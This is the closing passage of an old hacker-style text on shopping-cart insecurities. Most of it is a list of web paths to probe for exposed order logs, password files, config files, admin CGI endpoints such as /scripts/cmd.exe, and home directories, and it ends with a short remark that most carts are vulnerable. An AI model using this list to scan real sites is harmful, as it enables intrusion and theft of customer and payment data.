/msads/Samples/SELECTOR/showcode.asp /ncl_items.html /order/order.log /orders/checks.txt /orders/import.txt /orders/mountain.cfg /orders/order.log /orders/orders.txt /ping all /ping?SomeCrapHere /piranha/secure/passwd.php3 /pw/storemgr.pw /quikstore.cfg /samples/search/queryhit.htm /scripts /scripts/CGImail.exe /scripts/c32web.exe/ChangeAdminPassword /scripts/cart32.exe/cart32clientlist /scripts/cmd.exe /scripts/convert.bas /scripts/counter.exe /scripts/dbman/db.cgi?db=invalid-db /scripts/emurl/RECMAN.dll /scripts/fpcount.exe /scripts/iisadmin/ism.dll?http/dir /scripts/issadmin/bdir.htr /scripts/no-such-file.pl /scripts/proxy/w3proxy.dll /scripts/slxweb.dll /scripts/tools/mkilog.exe /scripts/tools/newdsn.exe /scripts/uploadn.asp /scripts/wa.exe /scripts/webbbs.exe /scripts/wsisa.dll /search97.vts /server-status /showfile.asp /ssi/envout.bat /ws_ftp.ini /~ /~bin /~guest /~log /~logs /~lp /~named /~root /~test /~tmp -- Most of all shopping carts are vuln in one way or another, its just finding a way around them, if the admins were to set the right permissions, just being smart is the key. That concludes The explaination of Shopping Carts and their insecurities. Merry Christmas.